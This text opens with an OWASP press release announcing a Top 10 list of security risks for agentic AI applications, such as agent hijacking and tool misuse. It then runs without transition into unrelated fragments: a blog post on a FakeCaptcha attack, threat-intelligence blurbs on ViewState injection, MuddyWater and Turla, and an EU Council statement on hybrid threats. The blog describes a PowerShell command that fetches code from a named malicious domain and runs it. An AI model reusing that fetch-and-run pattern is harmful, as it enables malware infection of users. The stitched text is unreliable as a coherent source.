News provided by
OWASP
Dec 10, 2025, 03:03 ET
WILMINGTON, Del., Dec. 10, 2025 /PRNewswire/ -- The OWASP GenAI Security Project (genai.owasp.org), a leading global open-source and expert community dedicated to delivering practical guidance and tools for securing generative and agentic AI, today released the OWASP Top 10 for Agentic Applications, a key resource to help organizations identify and mitigate the unique risks posed by autonomous AI agents.
Following more than a year of research, review and refinement, this Top 10 list reflects a culmination of input from over 100 security researchers, industry practitioners, user organizations and leading cybersecurity and generative AI technology providers. The result is not only a list of risks and mitigations, but a suite of resources designed for practitioners providing data-driven guidance.
The framework was further evaluated by the GenAI Security Project's Agentic Security Initiative Expert Review Board, which includes representatives from recognized bodies around the world such as NIST, European Commission and the Alan Turing Institute, among others. A full list of contributing organizations can be found here.
"This new OWASP Top 10 reflects incredible collaboration between AI security leaders and practitioners across the industry," said Scott Clinton, the OWASP GenAI Security Project's Co-Chair, Board Member, and Co-Founder. "As AI adoption accelerates faster than ever, security best practices must keep pace. The community's responsiveness has been remarkable, and this Top 10, along with our broader open-source resources, ensures organizations are better equipped to adopt this technology safely and securely."
Agent Behavior Hijacking, Tool Misuse and Exploitation and Identity and Privilege Abuse are some of the highlighted threats within the Top 10 and they showcase how attackers can subvert agent capabilities or their supporting infrastructure. Incidents involving these agentic systems are increasingly capable across industries, elevating the need for these new resources.
"Companies are already exposed to Agentic AI attacks - often without realizing that agents are running in their environments," said Keren Katz, Co-Lead for OWASP's Top 10 for Agentic AI Applications and Senior Group Manager of AI Security at Tenable. "While the threat is already here, the information available about this new attack vector is overwhelming. Effectively protecting a company against Agentic AI requires not only strong security intuition but also a deep understanding of how AI agents fundamentally operate."
"Agentic AI introduces a fundamentally new threshold of security challenges, and we are already seeing real incidents emerge across industry," said John Sotiropoulos, GenAI Security Project Board member, Agentic Security Initiative and Top 10 for Agentic Applications Co-lead, and Head of AI Security at Kainose. "Our response must match the pace of innovation, which is why this Top 10 focuses on practical, actionable guidance grounded in real-world attacks and mitigations. This release marks a pivotal moment in securing the next generation of autonomous AI systems."
The Top 10 for Agentic Applications joins a growing portfolio peer-reviewed resources released by the OWASP GenAI Security Project and its Agentic Security Initiative, including:
The State of Agentic Security and Governance 1.0: A practical guide to the governance and regulations for the safe and responsible deployment of autonomous AI systems.
The Agentic Security Solutions Landscape: A quarterly, peer-reviewed map of open-source and commercial agentic AI tools and how they support SecOps and mitigate DevOps–SecOps risks.
A Practical Guide to Securing Agentic Applications: Practical technical guidance for securely designing and deploying LLM-powered agentic applications.
Reference Application for Agentic Security: An OWASP FinBot Capture The Flag applications , designed to test and practice agentic security skills in a controlled environment.
Agentic AI Threats and Mitigations: This document is the first in a series to provide a threat-model-based reference of emerging agentic threats and discuss mitigations.
And more
"Over the past two and a half years, the OWASP Top 10 for LLM Applications has shaped much of the industry's thinking on AI security," said, Steve Wilson, OWASP GenAI Security Project Board Co-Chair, Founder of OWASP Top 10 for LLM, and CPO of Exabeam, Inc. "This year, we've seen agentic systems move from experiments to real deployments, and that shift brings a different class of threats into clear view. Our team met that challenge by expanding our guidance to address how agentic systems behave, interact, and make decisions. The LLM Top 10 will remain a core, regularly updated resource, and aligning both efforts is key to helping the community build safer, more reliable intelligent systems.
Discover what industry experts, researchers and leading global organizations have to say about the new Top 10 for Agentic Applications here.
The OWASP GenAI Security Project invites organizations, researchers, policymakers and practitioners to access the new Top 10 for Agentic Applications, contribute to future updates and join the global effort to build secure, trustworthy AI systems. Visit our site to learn more and how you can contribute.
About OWASP Gen AI Security Project
The OWASP Gen AI Security Project (genai.owasp.org) is a global, open-source initiative and expert community dedicated to identifying, mitigating, and documenting security and safety risks associated with generative AI technologies, including large language models (LLMs), agentic AI systems, and AI-driven applications. Our mission is to empower organizations, security professionals, AI practitioners, and policymakers with comprehensive, actionable guidance and tools to ensure the secure development, deployment, and governance of generative AI systems. Visit our site to learn more.
Developing a rigorous scoring system for Agentic AI Top 10 vulnerabilities, leading to a comprehensive AIVSS framework for all AI systems.
Key Deliverables
Hello and welcome back to another blog post. After some time of absence due to a lot of changes in my personal life ( finished university, started a new job, etc), I am happy to finally be able to present something new.
Chapter 1: Captcha-verified Victim
This story starts with a message by one of my long time internet contacts:
Figure 1: Shit hit the Fan
I assume, some of you can already tell from this message alone that something terrible had just happend to him.
The legitimate website of the German Association for International Law had redirected him to an apparent Cloudflare Captcha site asking him to execute a Powershell command on device that does a Webrequest (iwr = Invoke-WebRequest) to a remote website (amoliera[.]com) and then pipes the response into “iex” which stands for Invoke-Expression.
Thats a text-book example for a so called FakeCaptcha attack.
For those of you that do not know what the FakeCaptcha attack technique is, let me give you a short primer:
A Captcha in itself is a legitimate method Website Owners use to differentiate between bots (automated traffic) and real human users. It often involves at-least clicking a button but can additionally require the website visitor to solve different form of small tasks like clicking certain images out of a collection of random images or identifying a bunch of obscurely written letters. The goal is to only let users visit the website that are able to solve these tasks, which are often designed to be hard for computers but easy for human beings. Well, most of the times.
Microsoft Threat Intelligence observed limited activity by an unattributed threat actor using a publicly available, static ASP.NET machine key to inject malicious code and deliver the Godzilla post-exploitation framework. In the course of investigating, remediating, and building protections against this activity, we observed an insecure practice whereby developers have incorporated various publicly disclosed ASP.NET machine keys from publicly accessible resources, such as code documentation and repositories, which threat actors have used to launch ViewState code injection attacks and perform malicious actions on target servers.
MuddyC2Go framework and custom keylogger used in attack campaign.
Iranian espionage group Seedworm (aka Muddywater) has been targeting organizations operating in the telecommunications sector in Egypt, Sudan, and Tanzania.
Seedworm has been active since at least 2017, and has targeted organizations in many countries, though it is most strongly associated with attacks on organizations in the Middle East. It has been publicly stated that Seedworm is a cyberespionage group that is believed to be a subordinate part of Iran’s Ministry of Intelligence and Security (MOIS).
Summary Snake, also known as Turla, Uroburos and Agent.BTZ, is a relatively complex malware framework used for targeted attacks. Over the past year Fox-IT has been involved in multiple incident response cases where the Snake framework was used to steal sensitive information. Targets include government institutions, military and large corporates. Researchers who have previously analyzed…
Key Takeaways
RECALLS the relevant conclusions of the European Council1 and the Council2, ACKNOWLEDGES that state and non-state actors are increasingly using hybrid tactics, posing a growing threat to the security of the EU, its Member States and its partners3. RECOGNISES that, for some actors applying such tactics, peacetime is a period for covert malign activities, when a conflict can continue or be prepared for in a less open form. EMPHASISES that state actors and non-state actors also use information manipulation and other tactics to interfere in democratic processes and to mislead and deceive citizens. NOTES that Russia’s armed aggression against Ukraine is showing the readiness to use the highest level of military force, regardless of legal or humanitarian considerations, combined with hybrid tactics, cyberattacks, foreign information manipulation and interference, economic and energy coercion and an aggressive nuclear rhetoric, and ACKNOWLEDGES the related risks of potential spillover effects in EU neighbourhoods that could harm the interests of the EU.